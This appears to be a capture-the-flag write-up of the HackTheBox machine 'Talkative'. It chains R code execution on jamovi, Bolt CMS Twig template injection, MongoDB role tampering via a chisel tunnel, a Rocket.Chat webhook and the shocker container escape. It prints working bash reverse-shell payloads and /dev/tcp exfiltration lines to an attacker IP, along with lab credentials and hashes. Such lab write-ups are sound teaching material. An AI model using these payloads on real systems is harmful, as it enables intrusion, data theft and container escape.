Talkative

Summary

Talkative is about hacking multiple communication platforms and gaining access to multiple docker containers. Starting by getting the first foothold on a docker container by abusing R language editor on jamovi website to get code exec. From that docker I will get credentials for BOLT CMS. As admin I will modify a template so I can get code execution and get access to the next docker container. From this docker I can ssh to the host, where I will be finding a full docker network. Connecting to a specific docker gives the ability to work with mongoDB, so I will modify my user's role to admin and get admin acccess to rocket chat. Rocketchat is using webhooks which i will abuse to get connection back to me. This container have the CAP_DAC_READ_SEARCH capability which can be exploited to read all files on the hostmachine.

Enumeration

nmap revealed that 5 ports are open.

nmap -sCV -p- 10.10.11.155 -v  -oA nmap/full --min-rate 5000

Discovered open port 8080/tcp on 10.10.11.155
Discovered open port 80/tcp on 10.10.11.155
Discovered open port 8081/tcp on 10.10.11.155
Discovered open port 3000/tcp on 10.10.11.155
Discovered open port 8082/tcp on 10.10.11.155

and ssh is filtered so maybe the firewall is blocking our packets and not getting a response let nmap consider that port as filtered. So quick mind note is that if i did get a foothold but not to the host machine maybe I can ssh from the machine i get access to hoping it trusted to ssh into the network.

22/tcp   filtered ssh

Talkative port 80

At port 80 i can see the main website which is talkative

This website contains many useful informations like some potential users in the network which i can use later for bruteforce attacks.

and in the source code it reveals that it is using the bolt CMS

I worked with bolt before and I know that normally it is implemented at /bolt. Visiting talkative.htb/bolt

Nothing much here, i tried some default credentials but it didn't work. So its clear that i need credentials to access the bolt page.

Rocket Chat port 3000

Moving on to rocket chat

I tried some default credentials but it didn't work. So I created an account and tried to see how the platform looks like and if I can get any useful information.

it gives an error which says Invalid Domain, so I tried to change the domain of the email address to talkative.htb. Yeah it worked.

The only information I got from a normal user access, is that this user "Saul Goodman" is the admin.

Quick note: So if I can get Saul Goodman credentials or I can higher my privilege to admin then I can get admin access to rocket chat. Till then I'm moving on to jamovi webste.

Jamovi port 8080

Instantly I notice the logo of the R language so I check it out if I have the right to execute code. YES I have code exec capability so I googled how to execute system commands in R languge.

And "system" command appears and it requires multiple arguments but I will only need 2.

system(command, intern = TRUE)

Jamovi root shell

I just put the command i want to execute and set the intern to TRUE so i can get the output of the execution.

Going for reverse shell

I can notice from the name of the machine that is probably a docker container and the .dockerenv at / confirms this. I kept digging around till I found bolt-administration.omv at ~.

Sending this file to my attacking machine to analyze it in a comfortable environment.

cat bolt-administration.omv > /dev/tcp/10.10.14.20/9003

receiving the data and putting in a bolt-administration.omv file

nc -lvnp 9003 > bolt-administration.omv

I checked the md5sum of both files to make sure nothing went wrong during the transfer.

└─$ md5sum bolt-administration.omv                  
89a471297760280c51d7a48246f95628  bolt-administration.omv

root@b06821bbda78:~# md5sum bolt-administration.omv 
89a471297760280c51d7a48246f95628  bolt-administration.omv

Analyzing the file reveals that is a compressed file that contains different types of files

I unzipped the file and started navigating through the files hoping to find anything useful.

xdata.json is the most interesting file while it contains credentials.

cat xdata.json| jq -c ".[]"
{"labels":[[0,"Username","Username",false],[1,"matt@talkative.htb","matt@talkative.htb",false],[2,"janit@talkative.htb","janit@talkative.htb",false],[3,"saul@talkative.htb","saul@talkative.htb",false]]}
{"labels":[[0,"Password","Password",false],[1,"jeO09ufhWD<s","jeO09ufhWD<s",false],[2,"bZ89h}V<S_DA","bZ89h}V<S_DA",false],[3,")SQWGm>9KHEA",")SQWGm>9KHEA",false]]}
{"labels":[]}

Now I just need to figure out where I can use these creds. First thing that comes to mind is to simply ssh but like I said before ssh is filtered from outside so I can't have ssh connection from my machine, but if i can get it from this docker it will work. Unfortunately ssh isn't installed on this machine, i had an idea where i can tunnel my ssh to this container then use my ssh from this container to access the host machine but, i didn't take this path while i still have 2 login forms that i can test those creds on and if they didn't work then i will give this path a chance.

Saul Shell

Trying the creds I found on bolt login form but none of them worked. I started to get confused here then I had the idea to try an admin email with one of those passwords hoping there is a password reuse vulnerability. And boom I got in with those creds.

admin@talkative.htb
jeO09ufhWD<s

I checked the configuration panel and it contained a lot of configurations files.

Here I had a lot of ideas to get code execution, what if I have write permission on those files and that will be so easy to get code exec from php or .yaml files. I went to the bolt file and checked the config.yaml file, unfortunately i had no write permission on this file.

but I kept reading and noticed that it is using a template as a theme called base-2021 and that's worth a look.

I went for the twig files since I have a good idea about twig and I know that if I can get write permission I can execute code. First I will try to inject some html to see if anything happens and since that this is the index.twig then this will effect the home page of the website that bolt cms is implemented on, in this case it is talkative.htb.

I hit the Save Changes button and reloaded the talkative.htb page but nothing happened. I got confused to be honest because I was sure that this is going to work. I went back to the bolt page and start digging around. Fortunately I found Clear the cache functionality.

I instantly knew this was the reason since the page keeps loading with the cache stored in without implementing any new changes, so I cleared the cache and reloaded the talkative.htb page and "ichyaboy" popped up.

Now I'm going for code execution. I used a payload from PayloadsAllTheThings

{{['id']|filter('system')}}

To be honest I went straight for reverse shell

{{['bash -c "bash -i >& /dev/tcp/10.10.14.20/443 0>&1"']|filter('system')}}

I put my payload at index.twig, saved the changes, cleared the cache and started a listener on 443

then I reloaded the talkative.htb and boom I got a shell to the next docker container

I'm using the script command to stabilize my shell (I'm too lazy to use the python pty)

script /dev/null -c bash
CTRL^Z
stty raw -echo; fg
export TERM=xterm

First thing that came to mind is if this container have ssh installed or not, if yes then I maybe i can get to the host machine.

hopefully it is installed so now I need to get the host machine ip address.

This file provides information about the Address Resolution Protocol (ARP) cache, which is used to map IP addresses to corresponding hardware (MAC) addresses on a local network. Since there is one connection this will definitely be the host-machine address. Now all I need is to get the right credentials to login through ssh. After multiple combinations, Saul and the password of the bolt cms gave me a successful connection

saul
jeO09ufhWD<s

I got the user flag

saul@talkative:~$ cat user.txt 
458f****************************

Rocket Chat Root Shell

Now I start enumerating the box if I can find anything. I tried to look at the docker network but the docker command isn't installed in this box so I need to do that manually. I transferred an executable for nmap to facilitate my enumeration and then I can get more information about the services running on each docker.

I ran this command to find the active hosts on the host machines network

nmap -sn 172.17.0.0/16

Nmap scan report for 172.17.0.2
Host is up (0.0066s latency).
Nmap scan report for 172.17.0.3
Host is up (0.0066s latency).
Nmap scan report for 172.17.0.4
Host is up (0.0065s latency).
Nmap scan report for 172.17.0.5
Host is up (0.0065s latency).
Nmap scan report for 172.17.0.6
Host is up (0.0065s latency).
Nmap scan report for 172.17.0.7
Host is up (0.0064s latency).
Nmap scan report for 172.17.0.8
Host is up (0.0064s latency).
Nmap scan report for 172.17.0.9
Host is up (0.0064s latency).
Nmap scan report for 172.17.0.10
Host is up (0.0063s latency).
Nmap scan report for 172.17.0.11
Host is up (0.0063s latency).
Nmap scan report for 172.17.0.12
Host is up (0.0029s latency).
Nmap scan report for 172.17.0.13
Host is up (0.0027s latency).
Nmap scan report for 172.17.0.14
Host is up (0.0027s latency).
Nmap scan report for 172.17.0.15
Host is up (0.0027s latency).
Nmap scan report for 172.17.0.16
Host is up (0.0026s latency).
Nmap scan report for 172.17.0.17
Host is up (0.0026s latency).
Nmap scan report for 172.17.0.18
Host is up (0.0025s latency).
Nmap scan report for 172.17.0.19
Host is up (0.0023s latency).

Now to scan the services running on this hosts

./nmap -p- 172.17.0.2-19 --min-rate 10000 -v

Nmap scan report for 172.17.0.2
Host is up (0.00026s latency).
Not shown: 65534 closed ports
PORT      STATE SERVICE
27017/tcp open  unknown

Nmap scan report for 172.17.0.3
Host is up (0.00021s latency).
Not shown: 65534 closed ports
PORT     STATE SERVICE
3000/tcp open  unknown

Nmap scan report for 172.17.0.4
Host is up (0.000071s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 172.17.0.5
Host is up (0.00032s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http

map scan report for 172.17.0.6
Host is up (0.00022s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 172.17.0.7
Host is up (0.00030s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 172.17.0.8
Host is up (0.00026s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 172.17.0.9
Host is up (0.00024s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 172.17.0.10
Host is up (0.00030s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 172.17.0.11
Host is up (0.00025s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 172.17.0.12
Host is up (0.00029s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 172.17.0.13
Host is up (0.00030s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 172.17.0.14
Host is up (0.00023s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 172.17.0.15
Host is up (0.00026s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 172.17.0.16
Host is up (0.00017s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 172.17.0.17
Host is up (0.00021s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 172.17.0.18
Host is up (0.00018s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 172.17.0.19
Host is up (0.00018s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http

one host got my attention which is the one with port 27017 open which is the common mongoDB port. I can't access this service from Saul's machine because I don't have the required tools to interact with mongodb so I will Port forward this service with chisel to my attack machine (without to mention that I need to transfer chisel to the victim machine).

So on my attacking machine I will run this command to listen on port 27017

./chisel server -p 8000 --reverse -v

and on the victim machine i will run

./chisel client 10.10.14.20:8000 R:27017:172.17.0.2:27017

./chisel client chisel_server:port R:<remote-port>:<local-destination>:<local-port>

In summary, this chisel command sets up a reverse tunnel between the chisel client (running on the local machine) and the chisel server (running on 10.10.14.20). When traffic is sent to the chisel server on port 27017, it will be forwarded to the target machine with IP 172.17.0.2 on port 27017.

After port forwarding I need to download mongodb shell so I can work with that service.

mongosh
Current Mongosh Log ID: 64ce2537905a5b0be716a926
Connecting to:          mongodb://127.0.0.1:27017/?directConnection=true&serverSelectionTimeoutMS=2000&appName=mongosh+1.10.3
Using MongoDB:          4.0.26
Using Mongosh:          1.10.3

For mongosh info see: https://docs.mongodb.com/mongodb-shell/


To help improve our products, anonymous usage data is collected and sent to MongoDB periodically (https://www.mongodb.com/legal/privacy-policy).
You can opt-out by running the disableTelemetry() command.

------
   The server generated these startup warnings when booting
   2023-08-05T06:55:25.636+0000: 
   2023-08-05T06:55:25.636+0000: ** WARNING: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine
   2023-08-05T06:55:25.636+0000: **          See http://dochub.mongodb.org/core/prodnotes-filesystem
   2023-08-05T06:55:27.824+0000: 
   2023-08-05T06:55:27.824+0000: ** WARNING: Access control is not enabled for the database.
   2023-08-05T06:55:27.824+0000: **          Read and write access to data and configuration is unrestricted.
   2023-08-05T06:55:27.824+0000:
------

rs0 [direct: primary] test>

now I have shell access to the database and I can look around.

rs0 [direct: primary] test> show database;
MongoshInvalidInputError: [COMMON-10001] 'database' is not a valid argument for "show".
rs0 [direct: primary] test> show databases;
admin   104.00 KiB
config  124.00 KiB
local    11.44 MiB
meteor    4.79 MiB

rs0 [direct: primary] test> use meteor
switched to db meteor

rs0 [direct: primary] meteor> show collections
_raix_push_app_tokens
_raix_push_notifications
instances
meteor_accounts_loginServiceConfiguration
meteor_oauth_pendingCredentials
meteor_oauth_pendingRequestTokens
migrations
rocketchat__trash
...[SNIP]
users
usersSessions
view_livechat_queue_status                 [view]
system.views

users collections seems to be interesting

rs0 [direct: primary] meteor> db.users.find()

I got a lot of informations about the users in rocketchat

Admin's data:

{
    _id: 'ZLMid6a4h5YEosPQi',
    createdAt: ISODate("2021-08-10T19:49:48.673Z"),
    services: {
      password: {
        bcrypt: '$2b$10$jzSWpBq.eJ/yn/Pdq6ilB.UO/kXHB1O2A.b2yooGebUbh69NIUu5y'
      },
      email: {
        verificationTokens: [
          {
            token: 'dgATW2cAcF3adLfJA86ppQXrn1vt6omBarI8VrGMI6w',
            address: 'saul@talkative.htb',
            when: ISODate("2021-08-10T19:49:48.738Z")
          }
        ]
      },
      resume: { loginTokens: [] }
    },
    emails: [ { address: 'saul@talkative.htb', verified: false } ],
    type: 'user',
    status: 'offline',
    active: true,
    _updatedAt: ISODate("2023-08-05T07:06:06.305Z"),
    roles: [ 'admin' ],
    name: 'Saul Goodman',
    lastLogin: ISODate("2022-03-15T17:06:56.543Z"),
    statusConnection: 'offline',
    username: 'admin',
    utcOffset: 0
  }// Some code

my user's data:

{
    _id: 'sGpD9hCk53qF2Qdzy',
    createdAt: ISODate("2023-08-05T07:24:00.826Z"),
    services: {
      password: {
        bcrypt: '$2b$10$bmrfg6MQ1bpOrllcEJO0ue7R7R73/40LnOnKzKjzUDkZCCIZtFb9.',
        reset: {
          token: '8v2nfzMwF3B5m6NycHmRN2J-K_MI4hSa7_YSEFYbS69',
          email: 'ichyaboy@talkative.htb',
          when: ISODate("2023-08-05T07:24:04.580Z"),
          reason: 'enroll'
        }
      },
      email: {
        verificationTokens: [
          {
            token: 'l4lkBlBSftrHMMQbSJTUTX7opNc_5LR3YZNLEt9rZVM',
            address: 'ichyaboy@talkative.htb',
            when: ISODate("2023-08-05T07:24:00.872Z")
          }
        ]
      },
      resume: {
        loginTokens: [
          {
            when: ISODate("2023-08-05T07:24:01.170Z"),
            hashedToken: '8p/w938oOCeehYfWnk277jRoI+yfMJAjFPLhb5FqZxY='
          }
        ]
      }
    },
    emails: [ { address: 'ichyaboy@talkative.htb', verified: false } ],
    type: 'user',
    status: 'online',
    active: true,
    _updatedAt: ISODate("2023-08-05T08:41:05.432Z"),
    roles: [ 'user' ],
    name: 'ichyaboy',
    lastLogin: ISODate("2023-08-05T07:24:01.167Z"),
    statusConnection: 'online',
    utcOffset: 2,
    username: 'ichyaboy'
  }
// Some code

the roles key got my attention since I'm assigned as a normal user and as I said in Rocket Chat port 3000, if I can elevate my privilege I can have more functionalities in Rocketchat platform. So the idea is to update my role key to admin (or just change the hash of the password with mine and login as admin with my password).

rs0 [direct: primary] meteor> db.users.update( {"_id":"sGpD9hCk53qF2Qdzy"} , {$set: {"roles": ["admin"]}})
DeprecationWarning: Collection.update() is deprecated. Use updateOne, updateMany, or bulkWrite.
{
  acknowledged: true,
  insertedId: null,
  matchedCount: 1,
  modifiedCount: 1,
  upsertedCount: 0
}
// Some code

After looking around at platform, I found the integrations functionality which give the ability to create webhooks with the given script.

So my idea is to create a webhook with a script that returns shell back to me, but first I need to find out in which language should I write the script. After reading about Rocket chat in github I found out that it is written in typescript, so all I need is to write a script in js to get a reverse shell.

After trying multiple scripts this one worked

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.20/1337 0>&1'");

I saved the webhook then took it's URL, starting a listener at 1337 and curl that URL and I got a shell as root in rocket chat container.

Root Shell

After enumerating the box I didn't find any useful files, so I decided to check its capabilities but the problem is capsh isn't installed so I can't use capsh and linpeas. I went to check linpeas repository if I can find anything about the docker containers scan and yes i found 2_container.sh file which is responsible about this type of scans. I understood that capabilities are stored somewhere in /proc/self/status but hex encoded.

CapInh: 0000000000000000
CapPrm: 00000000a80425fd
CapEff: 00000000a80425fd
CapBnd: 00000000a80425fd
CapAmb: 0000000000000000

And to decode those files i will be using capsh

capsh --decode=a80425fd   
0x00000000a80425fd=cap_chown,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap

I started googling if any of these capabilities is dangerous. Hacktricks have an amazing explanation

I downloaded the shocker.c file and compiled it to shocker file

gcc shocker.c -o shocker

but transferring the file to the box was a bit tricky because neither nc, curl or wget are installed. So I just ran on my attacking machine

 nc -lvnp 9004 < shocker

and at the victim machine I ran

cat < /dev/tcp/10.10.14.20/9004 > shocker

I checked their md5sums and they are identical

└─$ md5sum shocker 
63ee1dcb313b98956c2ad38e0256d1be  shocker

root@c150397ccd63:~# md5sum shocker 
63ee1dcb313b98956c2ad38e0256d1be  shocker

now I execute it with giving the path of the file I want to read and give a filename to save its output to that file

./shocker /root/root.txt flag

root@c150397ccd63:~# cat root
3173****************************

I had a problem after compiling shocker.c and transferring it to the machine, I got this error "`GLIBC_2.34' not found". So I copied the shocker.c to talkative machine and compiled it there then sent it to the rocket chat container.

Note: even though CAP_DAC_OVERRIDE isn't present in this container but exploiting it works, you can use the shocker_write script at the same hacktricks page to override files, for example add user to the passwd file with root privileges.

PreviousLinux based Machines NextEncoding

Last updated 1 year ago